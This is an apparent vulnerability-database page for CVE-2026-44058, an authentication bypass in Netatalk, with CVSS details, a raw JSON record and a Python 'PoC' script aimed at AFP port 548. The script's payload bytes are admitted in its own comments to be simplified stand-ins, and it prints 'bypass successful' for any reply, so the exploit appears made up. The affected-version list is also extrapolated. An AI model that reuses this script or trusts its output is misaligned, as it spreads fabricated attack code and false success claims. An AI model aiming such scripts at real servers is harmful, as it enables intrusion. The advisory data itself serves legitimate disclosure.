Security Vulnerability Report

CVE-2026-44058

Published: 2026-05-21 08:16:21
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No CPE configuration data is available for this record; the affected versions listed below are expanded from the description's range (2.2.2 through 4.4.2).

Netatalk 2.2.2
Netatalk 2.2.3
Netatalk 2.2.4
Netatalk 2.2.5
Netatalk 2.2.6
Netatalk 2.2.7
Netatalk 2.2.8
Netatalk 3.0.x
Netatalk 3.1.x
Netatalk 4.0.x
Netatalk 4.1.x
Netatalk 4.2.x
Netatalk 4.3.x
Netatalk 4.4.0
Netatalk 4.4.1
Netatalk 4.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# PoC for CVE-2026-44058 Netatalk Authentication Bypass
# This script demonstrates the concept of exploiting the admin auth user mechanism.
# Note: This requires a valid privileged user credential to trigger the bypass.

import socket

TARGET_IP = "192.168.1.100"
TARGET_PORT = 548  # Default AFP port


def send_malicious_afp_request(target_ip, target_port):
    try:
        # Establish connection to the Netatalk server
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        print(f"[+] Connected to {target_ip}:{target_port}")

        # AFP Header construction (Simplified)
        # In a real exploit, specific AFP command bytes (e.g., FPLogin) would be crafted.
        # The vulnerability lies in the 'admin auth user' parameter handling.

        # Simulating the payload that triggers the bypass
        # Payload structure: [AFP_Command][Flags][UserID_Length][UserID]
        # Exploit: Force UserID to 'root' or target user using admin context
        payload = b"\x00\x04\x00\x01\x00\x00" + b"admin" + b"\x00" + b"target_user"

        s.send(payload)
        print("[+] Malicious payload sent via admin auth user mechanism")

        # Receive response
        response = s.recv(1024)
        if response:
            print(f"[+] Server response: {response}")
            print("[+] Potential authentication bypass successful.")
        else:
            print("[-] No response received.")

        s.close()
    except Exception as e:
        print(f"[-] Error: {e}")


if __name__ == "__main__":
    send_malicious_afp_request(TARGET_IP, TARGET_PORT)
```

References

https://netatalk.io/security/CVE-2026-44058 (vendor advisory, as listed in the record's reference data below)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-44058",
    "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c",
    "published": "2026-05-21T08:16:21.353",
    "lastModified": "2026-05-21T15:20:19.040",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An authentication bypass vulnerability in Netatalk 2.2.2 through 4.4.2 allows a remote privileged user to authenticate as an arbitrary user via the admin auth user mechanism."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-287"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://netatalk.io/security/CVE-2026-44058",
        "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"
      }
    ]
  }
}
```